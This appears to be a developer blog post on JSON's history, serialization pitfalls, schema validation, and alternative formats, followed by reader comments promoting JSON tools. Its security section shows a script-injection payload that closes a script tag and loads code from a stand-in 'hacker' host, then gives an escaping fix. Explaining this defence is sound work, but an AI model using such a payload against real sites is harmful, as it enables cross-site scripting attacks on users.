All things about JSON.
Begining
JSON - born out of web platform limitation and a bit of creativity. There was XMLHttpRequest to do request to the server without the need to do full reload, but XML is "heavy" on the wire, so Douglas Crockford thought of clever trick - we can use JavaScript Object Notation and eval
to pass data from the server to the client or vice versa in easy way. But it is not safe to execute arbitrary code (eval
) especially if it comes from 3rd party source. So next step was to standardize it and implement a specific parser for it. Later it becomes standard for all browsers and now we can use it as JSON.parse
.
limitation
Taking into account how it was born it comes with some limitations
Asymetric encoding/decoding
You know how JS tries to pretend that type errors doesn't exist and tries just coerce at any cost even if doesn't make much sense. This means that x == JSON.parse(JSON.stringify(x))
doesn't always hold true. For example:
-
Date
will be turned instring
representation, and after decoding it will stay astring
-
Map
,WeakMap
,Set
,WeakSet
will be turned in"{}"
- it will lose contents and type -
BigInt
for a change throwsTypeError: Do not know how to serialize a BigInt
- a function will be converted to
undefined
-
undefined
will be converted toundefined
- ES6 class and
new function(){}
will be converted into a representation of a plain object, but will lose type
Solution: One of possible solutions here is to use static type systems like TypeScript or Flow to prevent asymmetric types:
// inspired by https://github.com/tildeio/ts-std/blob/master/src/json.ts
export type JSONValue =
| string
| number
| boolean
| null
| JSONObject
| JSONArray;
type JSONObject = {[key: string]: JSONValue};
type JSONArray = Array<JSONValue>;
export const symetricStringify = (x: JSONValue) => JSON.stringify(x);
Though it will not save us from TypeError: Converting circular structure to JSON
, but will get to it later.
Security: script injection
If you use JSON as a way to pass data from the server to the client inside HTML, for example, the initial value for Redux store in case of server-side rendering or gon
in Ruby, be aware that there a risk of script injection attack
<script>
var data = {user_input: "</script><script src=http://hacker/script.js>"}
</script>
Solution: escape JSON before passing it to HTML
const UNSAFE_CHARS_REGEXP = /[<>\/\u2028\u2029]/g;
// Mapping of unsafe HTML and invalid JavaScript line terminator chars to their
// Unicode char counterparts which are safe to use in JavaScript strings.
const ESCAPED_CHARS = {
"<": "\\u003C",
">": "\\u003E",
"/": "\\u002F",
"\u2028": "\\u2028",
"\u2029": "\\u2029"
};
const escapeUnsafeChars = unsafeChar => ESCAPED_CHARS[unsafeChar];
const escape = str => str.replace(UNSAFE_CHARS_REGEXP, escapeUnsafeChars);
export const safeStringify = (x) => escape(JSON.stringify(x));
Side note: collection of JSON implementation vulnerabilities
Lack of schema
JSON is schemaless - it makes sense because JS is dynamically typed. But this means that you need to verify shape (types) yourself JSON.parse
won't do it for you.
Solution: I wrote about this problem before - use IO validation
Side note: there are also other solutions, like JSON API, Swagger, and GraphQL.
Lack of schema and serializer/parser
Having a schema for parser can solve the issue with asymmetry for Date
. If we know that we expect Date
at some place we can use string representation to create JS Date
out of it.
Having a schema for serializer can solve issue for BigInt
, Map
, WeakMap
, Set
, WeakSet
, ES6 classes and new function(){}
. We can provide specific serializer/parser for each type.
import * as t from 'io-ts'
const DateFromString = new t.Type<Date, string>(
'DateFromString',
(m): m is Date => m instanceof Date,
(m, c) =>
t.string.validate(m, c).chain(s => {
const d = new Date(s)
return isNaN(d.getTime()) ? t.failure(s, c) : t.success(d)
}),
a => a.toISOString()
)
Side note: see also this proposal
Lack of schema and performance
Having a schema can improve the performance of parser. For example, see jitson and FAD.js
Side note: see also fast-json-stringify
Stream parser/serializer
When JSON was invented nobody thought about using it for gigabytes of data. If you want to do something like this take a look at some stream parser.
Also, you can use a JSON stream to improve UX for slow backend - see oboejs.
Beyond JSON
uneval
If you want to serialize actual JS code and preserve types, references and cyclic structures JSON will be not enough. You will need "uneval". Checkout some of those:
- devalue
- lave
- js-stringify
- node-uneval
- node-tosource - Converts JavaScript objects to source
Other "variations to this tune":
- LJSON - JSON extended with pure functions
- serialize-javascript - Serialize JavaScript to a superset of JSON that includes regular expressions, dates and functions
- arson - Efficient encoder and decoder for arbitrary objects
- ResurrectJS preserves object behavior (prototypes) and reference circularity with a special JSON encoding
- serializr - Serialize and deserialize complex object graphs to and from JSON and Javascript classes
As a configuration file
JSON was invented to transmit data, not for storing configuration. Yet people use it for configuration because this is an easy option.
JSON lacks comments, requires quotes around keys, prohibits coma at the end of array or dictionary, requires paired {}
and []
. There is no real solution for this excepts use another format, like JSON5 or YAML or TOML.
Binary data
JSON is more compact than XML, yet not the most compact. Binary formats even more effective. Checkout MessagePack.
Side note: GraphQL is not tied to JSON, so you can use MessagePack with GraphQL.
Binary data and schema
Having binary format with schema allows doing some crazy optimization, like random access or zero-copy. Check out Cap-n-Proto.
Query language
JSON (as anything JS related) is super popular, so people need to work with it more and more and started to build tools around it, like JSONPath and jq.
Did I miss something?
Leave a comment if I missed something. Thanks for reading.
Top comments (10)
Very well written article Stereobooster. : )
I love JSON and how it's easy to use. I also like to suggest few tools and article which helps lovers of JSON .
jsonformatter.org . it's all in one JSON tool.
codebeautify.org/jsonvalidator . It's json validator
codeblogmoney.com/what-is-json/
I hope this help.
I'll just leave it here
s-expression
JSON
XML
I really hope you wouldn't use arrays to represent that kind of a structure, when it's clearly insane. Data structures should be designed for representing data and preventing invalid state, not looking pretty on your screen.
This is what that XML would actually translate to in JSON to have semantically similar meaning, and that would be as easy for computers to parse without errors:
Doesn't look so condensed anymore, now does it?
Also, which one of these is the easiest for a human eye to read? The XML.
You know this is not an actual argument, right?
JSON is not a data structure, this is serialisation format. Serialisation format judged on speed of serialisation/deserialisation, ability to be stream parsed, ability to do random reads, ability to encode cyclic dependencies etc.
Given example just demonstrates how s-expressions would look like in JSON. If you wonder what is real life example of usage - one is istf-spec
XML in given example is just a reference to the fact that it has roots in s-expression (this is kind of joke).
Given example didn't exactly come with a disclaimer. It is a s-expression vs. JSON vs. XML without much context, and in that example it looks like you're trying to desperately find a way to represent the XML in two formats that really are not suitable for representing that data.
Yes it is
s-expression vs. JSON vs. XML
, but I didn't draw any conclusions or anything like this. This is not a post where I claim one technology is total winner. I just had a chit-chat with tux0r. I'm not sure what exactly assaulted youJSON brings great convenience to network transmission, but when JSON data is very long, it will make people fall into tedious and complicated data node search.
Many online websites can solve this problem:)
jsonformatting.com/jsonformat
jsonformatting.com seems not working, I found a json validator which help me validate and format JSON data. jsonhome.com
Nice article.
Just in case someone needs a codebeautify.net/json/validator
JSON schema allows to validate JSON data: